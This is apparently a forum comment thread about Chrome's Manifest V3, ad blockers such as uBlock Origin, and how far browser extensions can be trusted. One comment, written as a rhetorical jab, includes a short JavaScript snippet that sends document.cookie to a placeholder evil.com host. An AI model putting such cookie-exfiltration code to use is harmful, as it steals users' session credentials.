Now we're back to needing an actual extension system that does what extensions were supposed to do in the first place.
Now we're back to needing an actual extension system that does what extensions were supposed to do in the first place.
Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good.
It's just that uBlock Origin is so insanely useful, important and trusted, it should get full access to the entire browser regardless. Honestly, it should be literally built into the browser instead of being a mere extension. Only the conflicts of interest inherent in an ad company maintaining an ad blocker prevent that.
Furthermore, malicious extension can read the data from the DOM, from forms (for example, password or credit card fields), and in some cases, from JS variables. They can insert fake information into the page. So preventing extensions from reading network data still leaves a lot of options for a malicious extension.
uBlock Origin via declarative blocks is almost as powerful as the original. While I would trust gorhill with almost unfettered control over my browser, I don't trust EVERY extension owner (no do I trust uBlock Origin in perpetuity).
A funny argument to make because the thing that would make such a measure ridiculous as you rightly point out, is exactly what already makes the Manifest changes ridiculous in the first instance. They were making a rhetorical point and you elaborated on their point for them as if doing so expressed a disagreement.
Are you trying to say that Mozilla/Firefox is engaging in the same data harvesting, usage, and dissemination that Google is?
If you don't like what a browser is doing, then move to another one? You're acting like you have spent a tonne of money on buying Chrome. Even if that was the case, it's not a clear case of an anti-user behaviour. There is a good reason to deprecate the webRequest API, and we'll see more browsers move towards that in the future (Safari has had declarative blocking for many years now, I believe).
>preventing modifications (and thus also repairs) is anti-competitive
There is nothing stopping someone from forking a manifest v2 version and maintaining it. I'd argue this can't be compared to any company actually doing anti-competitive things (e.g. tractor company, printers, ice cream machine companies, etc.)
An adblocker, by its nature, needs to access *. But Return YouTube Dislike could statically specify that it will only run on youtube.com, and that's fine.
But the option to enable access to * is essential.
Well that's what is in contention. Does everything claiming to be an adblocker really need access to *? Is Adblocker5++ (totally not malware) entitled to as much access as uBlock Origin? You can declare upfront all the URLs you don't want accessed (which on top of security gives a substantial performance boost), and who's to say someone won't figure out a better way of working within these constraints?
"Please stop looking at all network requests, especially when you don't need to."
doesn't result in action... while:
"You can no longer look at all network requests" requires extension makers to update to the new paradigm.
It's not "please stop looking at network requests", it's "ask the user for informed consent to look at network requests". Make it a big scary red warning if you want to. Definitely don't auto-grant it to existing extensions.
There are many options that don't involve removing functionality. It's like when Google removed SMS and clipboard permissions because they used to be too broad. People were pissed, a bunch of apps were killed, Google's walled garden got reinforced...
Scare prompt fatigue is real. If you're constantly blasting users with "XXX wants to do Y" which sounds scary, you're training them to just accept without thinking.
You fix an insecure implementation by replacing it with a secure implementation, not removing the feature completely.
Why are you installing random extensions?
What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.
If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?
Power users who care about this don't need a GUI - a text file config in any format will do. Especially in this era of LLM assistance.
Not nearly every user will get it right, so extensions will probably still have to be monitored for malware for the foreseeable future, but it gives many users at least a chance at privilege minimization.
To be honest, to me it sounds like you don't want browser extensions then.
To me, directly messing with web page data and browser behaviour is the whole point of a browser extension - what else is a browser extension for?
No thanks. They should have to declare to the browser what it is they want done instead.
I'd also argue that creating a full browser without a profit motive is more unrealistic than creating an extension and uploading it - for free - to a web store.
The best pure browser company in history was Opera, and they didn't fail because they weren't innovating. It is simply not a survivable model. People don't remember anything, but during Google's recent anti trust case, one floated "solution" was to spin Chrome off as a separate company, but that was regarded as unrealistic partly because such a company would not have a credible path to profitability separate from Google.
I happen to disagree, they could have collected a search licensing fee just like Firefox but that model is already being regarded as monopoly adjacent.
1. https://old.reddit.com/r/operabrowser/comments/3jxud3/exoper...
Here's how you can write a declaration that you want to exfiltrate cookies:
document.addEventListener("load", function(){
fetch("http://evil.com/"+document.cookie);
}); <body onLoad="http.GET('http://evil.com/"+document.cookie')">https://en.wikipedia.org/wiki/Declaration_(computer_programm...:
> a declaration in a syntactic language construct is the process of specifying identifier properties for its initialization
https://en.wikipedia.org/wiki/Statement_(computer_science):
> a statement is a syntactic unit of an imperative programming language that expresses some action to be carried out
Here's what the comment you're responding to said:
> They should have to declare to the browser what it is they want done instead.
Arguably it's pretty clear they meant declare in the first sense.
The argument has nothing at all to do with declaring permissions in a manifest.
Sounds like some kind of Stockholm syndrome. Years ago, it was standard practice for software to be designed so that users could grant permissions to access invasive methods or functions.
Google relies on users' personal data (ads), which is why they introduced a unique ID to their Chrome browser (to track).
This is so funny to me. Coming from a Netscape Navigator world, when extensions first came out, they were supposed to allow the user to add functionality to websites.
Why would someone install "random extensions" that they dont trust. And also, what would extensions do if not read and write data to websites? .
Sign of the times I guess.
Same reason why people download random stuff and run it with administrator permissions on Windows.
An extension that you trust today can be sold to an unscrupulous third-party tomorrow. That has happened many many times and will continue to.
"Somehow, when people get into the internet, their IQ decreases like 50 points. Like, if a guy knocked on your house door and offered you to give you a million dollars if you just gave him a thousand now, you would tell him to F. off. But somehow on the internet people thing it's right"
Same with these apps, someone comes and tells you to let him install this great water appliance for your backyard. You let him come in. But somehow in the internet, you also give him the key so that he can come in again anytime he wants... he may sell the key, lose the key, do something malicious later,etc. But due to ignorance, people dont grasp what they are doing in the digital world. People lack the necessary mental models.
Yes, and I have actually started virtualizing everything inside my computer because of that belief. I don't want random software touching my trusted host.
"Random software" is currently defined as anything outside the official repositories of my Linux distribution of choice. I don't want to share a home directory with such things. I don't want to share a user and its permissions, I don't even want to share a kernel with them.
In fact, it is possible for people to be held to good conduct without being bound into a single hierarchy, and it should be possible for software to be held to good conduct without giving such power to single monopolists. But it's not in Google's interests to build such mechanisms, any more than it was in the interests of the feudal overlords to look for alternatives to their rule.
The fact someone gave developers a turing complete language inside the browser where random code is automatically downloaded and executed is a major reason why we even have uBlock Origin in the first place. The vast majority of developers heavily abuse this privilege and cannot be trusted, and that is why we block them with extreme prejudice.
My dream was to have a "custom HTTP client" for every website. Instead of one browser for all sites, I write "adapters" for them that scrape the data into my own schemas. Maintaining this was far too much work back then, but now that I've got AI... I think I might try it.
Do you mean the rules like
*##+js(acis, document.oncontextmenu)
(an example I just added (copied) today)? I've had a lot of trouble figuring out how to make these properly.>reverse engineering websites and directly using all the internal APIs their own javascripts consume.
Interesting. By userscript or some other way? I've run into a number of situations where I either can't find a pointer to the internal js, or if I do find one, the browser or something ends up preventing me from accessing or modifying internal state with some sort of permission error. The latter might just be React though.
I'd be very interested in looking, if you have open sourced any of this.
Agreed. And you would think most paranoid HN types would too.
> It's just that uBlock Origin is so insanely useful, important and trusted
Maybe I'm foggy on the history. But isn't this like Fork #4 or #5 of some previous AdBlock extension?
Seems like the only business model for this type of extension is "selling out" for certain ads. And then the cycle repeats and forum posters tell you to install qBlock Omega or whatever. Maybe Mozilla doesn't want to get in the middle of this?
IIRC it was written from scratch. It was called uBlock before, then a co-maintainer tried to pull some shit, and the original author had to fork it with a new name (I don’t remember the details, it’s been ages since then).
No selling out yet. The author also explicitly says they don’t accept donations. I don’t think he’s looking for a business model. But if that changes – yeah, the fork button is right there, so I don’t see a big problem here.
The right thing is to simply bypass all of that. The fact is uBlock Origin should be literallly built into the browser like the good old popup blockers once were.
If only we had a browser that was independent of ad money.
I also don't want "random" programs accessing my home folder. That would be terrible! Who knows what programs that could be! I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily. Same for extensions.
The goal here isn't really to protect me from extensions. Extensions don't do anything on their own, they just sit there and wait for me to install them. So the goal is apparently to protect me from me (installing an extension), which really is to say protect their business (ads) from me (blocking them).
> I do however want the very specific programs that I have intentionally installed to be able to access my home folder easily.
I don't. My standard operating practice is to virtualize them.
My security posture is considerably more lax towards free and open source software, for obvious reasons, and even then this trust only extends to the software in my Linux distribution's repositories. Stuff coming from PyPI, npm, cargo, ruby gems, and other such "developer centric" repositories get the full virtualization treatment. If it's easy for randoms to publish packages, then it's equally easy for malware to make it in.
I have a base system image that gets forked off into delta qcow2 images for every project I'm working on or whatever ephemeral execution context I need.
I started a side project to build software just to manage those VMs. I'm daily driving this thing even though it's my first "vibecoded" project, it's just way too useful and has saved me quite a few times from accidents.
https://github.com/matheusmoreira/virtdev
The firewall works but it's pretty clunky. I'm working on a custom Rust network stack to replace it.
You'd probably prefer something that isn't literally made by one guy and his AIs though. Docker sandboxes seem to be a good solution that also employs virtualization.
https://news.ycombinator.com/item?id=49239751
Before I made all this, I used to use firejail.
But you can't lock down everyone else's general-purpose computers just because you are more careful than the average. You're supporting the big corporations in the war against general-purpose computing here.
I was under the impression that manifest v3 still allowed extensions to read anything, just not modify. Is that not the case? (Random link because this is hard to search for: https://news.ycombinator.com/item?id=38303446 )
Don't kid yourself, even with mv3 if you install a rogue extension it's going to have access to a lot more data than you would be comfortable sharing to.
What you are asking for is simply impossible, even without any permissions rogue extensions can still do a lot. It's what some developers spend their entire time working on.
If Google couldn't fix it with Android, which has granular permission per applications, why do you think it's going to be even remotely effective on the web browser ?
Clearly “random” was used as a means of saying “any”, to describe extensions the author hasn’t thought of. That will be obvious to anyone arguing in good faith and steel manning the argument.
They probably have strong implicit pressure not to.
Orion does this. It's still a little too rough around the edges to recommend as a daily driver though.
I don't want that! I want to be able to install any extension whatsoever (as we still can, more or less, install programs). And if I'm clueless enough to install "random" extensions that'll harm me, then shame on me! How often has it happened for the whole existence of Manifest V2 anyway?
Maybe we could have tolerated a well-hidden, well-protected "advanced" flag to open that possibility. But removing Manifest V2 altogether is unforgivable.
Also, security is a very very very weak argument, as many ads are much more dangerous and toxic than any popular extension will ever be.
I also want my browser to prevent random third-party javascript from doing the same. And I care more about that one, because as a user I don't have control over said third-party javascript while I do have control over the extensions I'm using. The browser is supposed to be a user agent, not act as an extension of the website owner.
If you look at the threat vectors for the revenue of a company like Google, extensions that aren't limited by the browser are pretty much number one.
This should tell you everything you need about the matter.
Google has no shortage of options for serving up ads that can't be blocked by normal ad blockers across all their properties (youtube, search, etc.). They in-line the ads these days! And if they really cared about the fraction of a fraction of a percent of people that even install any kind of adblocker, they could make the served ad content un-blockable by serving it the exact same as the content.
Fine, then don't install them?
It's like saying you want your TV to stop random people from watching it, but the obvious solution to that problem is to not invite random people into your living room.
Aaaand that's why I'm using Vivaldi over here (which has a built-in adblocker).
More seriously: if you don't want X to do Y, the solution is to not give X the permission Y. The platform overlord removing the premission Y completely is a terrible solution.
I see this repeated over and over and yet uBlock Origin Lite still seems to block almost all ads. I'm not saying I wouldn't prefer the non-lite version. But, given I basically still don't see ads it's kind of hard to argue Google destroyed the APIs so that they're useless
In practice to me these are non-issues. With MV2 uBO you basically already grant it maximum permissions since it’s all or nothing with MV2. So giving full permissions with MV3 uBOL is no different. Which eliminates the cosmetic filtering and script injection limitations.
The rule limit can maybe be an issue, but I’ve never run into it unless I literally go hog wild and overboard on filter lists.
“Limited dynamic filtering capabilities” is more abstract to me at least and I can’t say what’s missing here.
In practice though ultimately I notice no difference between Lite and the original.
The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads.
If they are hidden for you, it's because you, the user, hid them or enabled the overflow extension menu.
The issue is that adblocking doesn't work with it, so an addition, or workaround should be made, but when Google has the amount of influence they have, that didn't happen.
The upshut is that people hate ads and like free stuff, so there is now a good selling point for Firefox. Hell some of us switched to Firefox because it blocked popup ads and had tabs, back in the day.
Except this is objectively not true…
uBlock Origin Lite is nearly as good as uBO and blocks nearly everything except for mostly Twitch ads.
Manifest v3 is a big security upgrade and effectively closes off the permanent RCE pathway that v2 allowed.
If that would have been the case, extensions wouldn’t exist.
Extension are a way to make the browser do what the browser manufacturer didn’t think or care about.